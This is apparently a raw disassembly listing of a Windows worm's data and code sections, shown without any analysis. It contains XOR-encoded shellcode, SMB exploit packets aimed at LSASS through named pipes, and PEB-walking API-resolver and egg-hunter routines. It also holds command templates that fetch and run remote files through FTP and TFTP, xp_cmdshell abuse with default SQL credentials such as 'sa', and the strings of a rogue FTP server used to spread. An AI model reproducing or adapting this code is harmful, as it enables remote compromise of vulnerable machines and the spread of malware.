dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_4254CC dd 20h, 0 dd 20h, 5C005Ch, 0
off_4254E0 dd offset aSubway+4 ; DATA XREF: sub_403166+15A�o
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
align 10h
dword_425520 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
aFxnbfxfxnbfxfx: ; DATA XREF: sub_403166+45�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrrrr db ''
db ''
db '',0
dword_425630 dd 18759Fh dword_425634 dd 100139Dh asc_425638: ; DATA XREF: sub_402FCD+1C�o
; sub_4030B0+16�o
unicode 0, <\\>,0
align 10h
aIpc: ; DATA XREF: sub_402FCD+C�o
; sub_4030B0+B�o
unicode 0, <\IPC$>,0
aSPipeEpmapper db '\\%s\pipe\epmapper',0 ; DATA XREF: sub_4033B6+41�o
align 10h
jmp short loc_425672
; =============== S U B R O U T I N E =======================================
sub_425662 proc far ; CODE XREF: sub_425662:loc_425672�p
pop ebx
dec ebx
xor ecx, ecx
mov cx, 125h
loc_42566A: ; CODE XREF: sub_425662+C�j
xor byte ptr [ebx+ecx], 99h
loop loc_42566A
jmp short loc_425677
; ---------------------------------------------------------------------------
loc_425672: ; CODE XREF: .text:00425660�j
call near ptr sub_425662
loc_425677: ; CODE XREF: sub_425662+E�j
jo short loc_4256DB
cdq
cdq
cdq
mov ch, 38h
test eax, 12999999h
fst dword ptr [ebp+3485E912h]
adc dh, cl
xchg eax, ecx
adc ch, [esi-0Dh]
popf
sal byte ptr [ecx+2], 99h
cdq
cdq
jnp short loc_4256F9
icebp
stosb
stosd
cdq
cdq
icebp
out dx, al
jmp far ptr 128Fh:66CDC6ABh
; ---------------------------------------------------------------------------
db 71h
dd 71C09DF3h, 9999991Bh, 7518607Bh, 99999809h, 9898F1CDh
dd 0CF669999h, 0C9C9C989h, 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h
dd 0F1989999h, 4B9D999Bh
; ---------------------------------------------------------------------------
adc dl, [ebp-0Dh]
loc_4256DB: ; CODE XREF: sub_425662:loc_425677�j
mov eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dd 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh, 0CD751AA9h, 0F3BDA514h
dd 7B32C08Ch
db 64h
; ---------------------------------------------------------------------------
loc_4256F9: ; CODE XREF: sub_425662+35�j
pop edi
fnstsw word ptr [ebp-22982277h]
mov ebp, 0BDC510A4h
rcl dword ptr [eax], 1
lds edi, [ebp-423AEF2Bh]
leave
adc al, 0DDh
mov ebp, 0C8C9CD89h
enter 0FFFFF3C8h, 98h
enter 66C8h, 0EFh
test eax, 9DCF66C8h
adc dl, [ebp-0Dh]
db 66h, 66h
test al, 66h
iret
sub_425662 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dw 6685h
dd 0CFC895CFh, 12A5DC12h, 9AE1B1CDh, 0EB12CB4Ch, 0AA6C9AB9h
dd 34D8D050h, 42AA5C9Ah, 0A3892796h, 5891ED4Fh, 439A9452h
dd 0A26872D9h, 0C37EEC86h, 9ABDC312h, 9512FF44h, 85C312D2h
dd 9D12449Ah, 325C9A12h, 715AC0C7h, 66666699h, 7597D717h
dd 8F2A67EBh, 579C4034h, 0F9795776h, 0A2657452h, 346C9040h
dd 0F9336075h, 0E05FE07Eh, 0
; ---------------------------------------------------------------------------
loc_4257A0: ; DATA XREF: sub_403833+157�o
; sub_403833+214�o
jmp short loc_4257B2
; =============== S U B R O U T I N E =======================================
sub_4257A2 proc near ; CODE XREF: sub_4257A2:loc_4257B2�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_4257AA: ; CODE XREF: sub_4257A2+C�j
xor byte ptr [edx+ecx], 99h
loop loc_4257AA
jmp short loc_4257B7
; ---------------------------------------------------------------------------
loc_4257B2: ; CODE XREF: .text:loc_4257A0�j
call sub_4257A2
loc_4257B7: ; CODE XREF: sub_4257A2+E�j
jo short near ptr dword_425730+1Eh
cwde
cdq
cdq
retn
sub_4257A2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_425850 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_403833+106�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_425938 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_403C74+85�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_4259C8 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403C74+B1�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 2 dup(0)
dword_425A78 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403C74+D8�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_425B58 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403833+59�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_0: ; DATA XREF: sub_403833+8B�o
unicode 0, <C$>,0
a?????_0 db '?????',0
align 10h
dword_425BC0 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403833+2AC�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_425C30 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403833+2D3�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_425CD8 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403833+3B2�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_425D58 dd offset loc_401493+2 ; DATA XREF: sub_403833+3E0�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_407078+4
dd 1, 0
dd 1, 0
dd offset loc_407078+4
dd 1, 0
dd 1, 0
dd offset loc_407078+4
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_425DF0 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403833+308�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_425E60 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_403833+333�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_425ED8 dd 0 dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 3 dup(0)
aWinxpProfess_0 db 'WinXP Professional [universal] lsass.exe ',0
align 8
dword_425F98 dd 1004600h ; sub_403833+247�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo qu'
; DATA XREF: sub_4036D2+BE�o
; sub_40514F+9D�o
db 'it >> o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
align 4
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: sub_4036D2+97�o
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_4040E5+B2�o
align 4
dword_4260DC dd 10FF8h, 0 dword_4260E4 dd 10FF8h dword_4260E8 dd 7FFDF020h, 0 dword_4260F0 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) dd 13370000h, 0
dd 2006200h
aPcNetworkPro_1 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_1 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_426178 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_4261A8 dd 0 dd 800000D4h, 2 dup(0)
unk_4261B8 db 81h ; ; DATA XREF: sub_4045DE+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 2 dup(0)
byte_426208 db 41h ; DATA XREF: sub_40467C+108�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
; =============== S U B R O U T I N E =======================================
sub_426250 proc near ; DATA XREF: .text:00404956�o
push ebx
push esi
push edi
sub sp, 80h
mov esi, esp
call sub_42634C
push dword ptr [esi]
push 63D61209h
call sub_426362
mov [esi+8], eax
call sub_426315
push dword ptr [esi+4]
push 0CA2BD06Bh
call sub_426362
mov [esi+0Ch], eax
call sub_4262C7
push dword ptr [esi+4]
push 4C0297FAh
call sub_426362
xor ebx, ebx
push 410h
push ebx
call eax
mov ebx, eax
push esi
mov esi, [esi+10h]
mov edi, eax
mov ecx, 410h
rep movsb
pop esi
xor eax, eax
push eax
push eax
push eax
push ebx
push eax
push eax
call dword ptr [esi+0Ch]
mov eax, [esi+8]
add sp, 80h
pop edi
pop esi
pop ebx
jmp eax
sub_426250 endp
; =============== S U B R O U T I N E =======================================
sub_4262C7 proc near ; CODE XREF: sub_426250+33�p
var_20 = dword ptr -20h
var_14 = dword ptr -14h
pusha
call sub_4262F0
mov eax, [esp+20h+var_14]
lea ebx, [eax+7Ch]
add dword ptr [ebx+3Ch], 5
add dword ptr [ebx+28h], 1000h
and dword ptr [ebx+28h], 0FFFFF000h
mov eax, [esp+20h+var_20]
add esp, 14h
push eax
xor eax, eax
retn
sub_4262C7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4262F0 proc near ; CODE XREF: sub_4262C7+1�p
xor edx, edx
push dword ptr fs:[edx]
mov fs:[edx], esp
xor ebx, ebx
mov eax, 42904290h
loc_4262FF: ; CODE XREF: sub_4262F0+1A�j
xor ecx, ecx
mov cl, 2
mov edi, ebx
repe scasd
jz short loc_42630C
inc ebx
jmp short loc_4262FF
; ---------------------------------------------------------------------------
loc_42630C: ; CODE XREF: sub_4262F0+17�j
mov [esi+10h], edi
pop dword ptr fs:[edx]
pop eax
popa
retn
sub_4262F0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_426315 proc near ; CODE XREF: sub_426250+1E�p
pusha
mov edi, 7FFDF020h
mov ebx, [edi]
mov eax, [esi+8]
mov [edi], eax
mov edi, [edi-8]
add edi, 178h
mov ecx, edi
loc_42632D: ; CODE XREF: sub_426315+1E�j
cmp [ecx], ebx
jz short loc_426335
mov ecx, [ecx]
jmp short loc_42632D
; ---------------------------------------------------------------------------
loc_426335: ; CODE XREF: sub_426315+1A�j
mov edx, edi
loc_426337: ; CODE XREF: sub_426315+2A�j
cmp [edx+4], ebx
jz short loc_426341
mov edx, [edx+4]
jmp short loc_426337
; ---------------------------------------------------------------------------
loc_426341: ; CODE XREF: sub_426315+25�j
mov [ecx], edx
mov [edx+4], ecx
mov byte ptr [ebx-3], 1
popa
retn
sub_426315 endp
; =============== S U B R O U T I N E =======================================
sub_42634C proc near ; CODE XREF: sub_426250+A�p
mov eax, ds:7FFDF00Ch
mov eax, [eax+1Ch]
mov ebx, [eax+8]
mov [esi], ebx
mov eax, [eax]
mov eax, [eax+8]
mov [esi+4], eax
retn
sub_42634C endp
; =============== S U B R O U T I N E =======================================
sub_426362 proc near ; CODE XREF: sub_426250+16�p
; sub_426250+2B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov ebp, [esp+20h+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_426378: ; CODE XREF: sub_426362+33�j
jecxz short loc_4263B2
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
xor eax, eax
cld
loc_426385: ; CODE XREF: sub_426362+2D�j
lodsb
cmp al, ah
jz short loc_426391
ror edi, 0Dh
add edi, eax
jmp short loc_426385
; ---------------------------------------------------------------------------
loc_426391: ; CODE XREF: sub_426362+26�j
cmp edi, [esp+20h+arg_0]
jnz short loc_426378
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
mov [esp+20h+var_4], eax
popa
retn 8
; ---------------------------------------------------------------------------
loc_4263B2: ; CODE XREF: sub_426362:loc_426378�j
; sub_426362:loc_4263B2�j
jmp short loc_4263B2
sub_426362 endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
sub_4263B8 proc near ; DATA XREF: .text:00404906�o
arg_0 = dword ptr 4
add esp, 0FFFFF254h
cld
call sub_42640A
mov eax, [ebp+3Ch]
mov edi, [ebp+eax+78h]
add edi, ebp
mov ecx, [edi+18h]
mov ebx, [edi+20h]
add ebx, ebp
loc_4263D5: ; CODE XREF: sub_4263B8+38�j
jecxz short loc_426405
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor eax, eax
cdq
loc_4263E0: ; CODE XREF: sub_4263B8+32�j
lodsb
test al, al
jz short loc_4263EC
ror edx, 0Dh
add edx, eax
jmp short loc_4263E0
; ---------------------------------------------------------------------------
loc_4263EC: ; CODE XREF: sub_4263B8+2B�j
cmp edx, [esp+arg_0]
jnz short loc_4263D5
mov ebx, [edi+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edi+1Ch]
add ebx, ebp
mov ebx, [ebx+ecx*4]
add ebx, ebp
loc_426405: ; CODE XREF: sub_4263B8:loc_4263D5�j
mov [esp+arg_0], ebx
retn
sub_4263B8 endp
; =============== S U B R O U T I N E =======================================
sub_42640A proc near ; CODE XREF: sub_4263B8+7�p
; FUNCTION CHUNK AT 00426442 SIZE 00000007 BYTES
xor eax, eax
mov eax, fs:[eax+30h]
test eax, eax
js short loc_426423
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
jmp loc_42642E
; ---------------------------------------------------------------------------
loc_426423: ; CODE XREF: sub_42640A+8�j
mov eax, [eax+34h]
add eax, 7Ch
mov ebp, [eax+3Ch]
loc_42642E: ; CODE XREF: sub_42640A+14�j
pop edi
xor esi, esi
pusha
push esi
jmp short loc_426442
sub_42640A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_426435 proc near ; CODE XREF: sub_42640A:loc_426442�p
push 60E0CEEFh
push 0E8AFE98h
push edi
jmp edi
sub_426435 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42640A
loc_426442: ; CODE XREF: sub_42640A+29�j
call sub_426435
loc_426447: ; DATA XREF: sub_40408A+1B�o
; sub_40CD3A+7CD�o ...
add [ebx], ah
; END OF FUNCTION CHUNK FOR sub_42640A
; ---------------------------------------------------------------------------
db 3 dup(0)
dword_42644C dd 60h dword_426450 dd 62B0606h, 2050501h, 0A0hdword_42645C dd 30h ; .text:0042C45C�o ...
dword_426460 dd 0A1h dword_426464 dd 3 aCccc db 'CCCC',0 ; DATA XREF: sub_4040E5+153�o
align 10h
loc_426470: ; DATA XREF: sub_4040E5+E8�o
jmp short near ptr dword_426478
; ---------------------------------------------------------------------------
align 8
dword_426478 dd 0 dword_42647C dd 2F2F7325h, 2E732520h, 0aCmdKEchoOpenSD db 'cmd /k echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &'
; DATA XREF: .text:0040492B�o
db 'echo quit >> o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
aExecMaster___0 db 'EXEC master..xp_cmdshell ',27h,'%s',27h,0 ; DATA XREF: sub_404EC7+186�o
align 4
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'del eq&echo open %s %d >> eq&echo us'
; DATA XREF: sub_404EC7+152�o
db 'er %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq '
db '&%s&del eq',0Dh,0Ah
db 27h,0
align 4
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
; DATA XREF: sub_404EC7+BE�o
align 4
aAdmin db 'admin',0 ; DATA XREF: sub_404EC7+29�o
; .text:0042C3F0�o
align 4
aRoot db 'root',0 ; DATA XREF: sub_404EC7+22�o
; .text:0042C3F8�o ...
align 4
aSa db 'sa',0 ; DATA XREF: sub_404EC7+1B�o
; .text:0042DAC4�o
align 10h
dword_4265F0 dd 0C933FA8Bh, 909035B2h, 0C1816690h, 0C7830138h
; DATA XREF: .text:00405326�o
db 1Ah
; ---------------------------------------------------------------------------
loc_426601: ; CODE XREF: .text:00426608�j
mov bl, [edi]
xor bl, dl
mov [edi], bl
inc edi
loop loc_426601
ficom word ptr [esi]
dec edi
pop esp
aaa
xor [ecx+6Ch], bl
; ---------------------------------------------------------------------------
dw 28CDh
dd 0E4B9EBA9h, 36E14579h, 151512C5h, 66623D05h, 7066A07h
dd 7979711Bh, 0DD30DE34h, 0CACACACCh, 1FD8B668h, 516C055Fh
dd 75BE34BEh, 2945BE39h, 3D4DBE98h, 0BE096AB8h, 0BECE342Eh
dd 0CE344D6Eh, 34297EBEh, 1166BECCh, 6466CF34h, 156EBE67h
dd 0FC04CE34h, 0ACF50474h, 34BE01BEh, 0F70499CBh, 0F5B1D7E4h
dd 833AC240h, 71B83070h, 0C533170h, 53D44025h, 6D6F2504h
dd 6765636Bh, 74257B1Eh, 7F39823Ah, 34BD31BEh, 78833ACDh
dd 0B871BC30h, 3078CBEDh, 78CB8B40h, 0CB144131h, 68B81778h
dd 0E5CA662Dh, 315FF2BCh, 3070BD6Dh, 3F4270B5h, 0B54168B8h
dd 0DC21135Eh, 0CACACA4Dh, 0EE04FBBCh, 66666666h, 0CA637363h
dd 6D60A2E5h, 5F05BC53h, 0CA626025h, 637BE160h, 0F960CA62h
dd 0CA626066h, 0B8A2E560h, 0CA65BD70h, 6060D160h, 0B8DD60CAh
dd 0A1393071h, 501B5D66h, 695D504Dh, 0A1515856h, 70B8E704h
dd 6262A1F9h, 0CB666662h, 67C734F3h, 4D70B8A1h, 0BD70B865h
dd 663D8465h, 0CB255F66h, 666667FBh, 60CA6066h, 0CACA5FD9h
dd 0D560h
word_426744 dw 7A69h ; DATA XREF: sub_40514F+30�r
align 4
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_405398+5B1�o
aQuit db 'QUIT',0 ; DATA XREF: sub_405398+59D�o
; sub_40CD3A+4FC�o
align 4
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_405398+590�o
align 10h
dword_426790 dd 28026502h, 62302E31h, 20282029h, 2E707466h, 1F641F6Dh
; DATA XREF: sub_405398+545�o
dd 2029206Ch, 2BBBB02h
aFileSentToSOnP db ' File sent to %s on port %d, now executing %s on remote machine.'
db 0
align 10h
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_405398+526�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_405398+4FA�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_405398+4E2�o
align 4
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_405398+4D2�o
align 4
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_405398+4C1�o
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_405398+48E�o
align 10h
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_405398+44A�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_405398+411�o
align 10h
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_405398+3E3�o
align 4
aList db 'LIST',0 ; DATA XREF: sub_405398+3D0�o
align 10h
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_405398+395�o
align 4
aPasv db 'PASV',0 ; DATA XREF: sub_405398+382�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_405398+372�o
aI: ; DATA XREF: sub_405398+35E�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_405398+337�o
aA: ; DATA XREF: sub_405398+323�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: sub_405398+30C�o
; sub_405398+347�o
align 4
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_405398+2FC�o
align 4
off_42694C dd offset dword_445750 ; DATA XREF: sub_405398+2E8�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_405398+2D8�o
align 4
aRest db 'REST',0 ; DATA XREF: sub_405398+2C4�o
align 4
a215Fuckftpd db '215 fuckFtpd',0Ah,0 ; DATA XREF: sub_405398+2B4�o
align 4
aSyst db 'SYST',0 ; DATA XREF: sub_405398+2A0�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_405398+290�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_405398+27C�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_405398+26C�o
align 4
aUser_0 db 'USER',0 ; DATA XREF: sub_405398+257�o
; .text:0042C428�o ...
align 4
aSS db '%s %s',0 ; DATA XREF: sub_405398+246�o
align 4
a220Fuckftpd0wn db '220 fuckFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_405398+1C8�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_4059FC+24�o
; sub_406B84+12E�o ...
align 4
unk_4269E8 db 2 ; DATA XREF: sub_405A96+3D3�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorServerFai db 'Error: server failed, returned: <%d>.',0
align 10h
asc_426A30 db 0Dh,0Ah,0 ; DATA XREF: sub_405A96+2BE�o
align 4
asc_426A34: ; DATA XREF: sub_405A96+282�o
; sub_40CD3A+A8�o ...
unicode 0, < >,0
aGet db 'GET ',0 ; DATA XREF: sub_405A96+258�o
align 10h
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_405ECC+F0�o
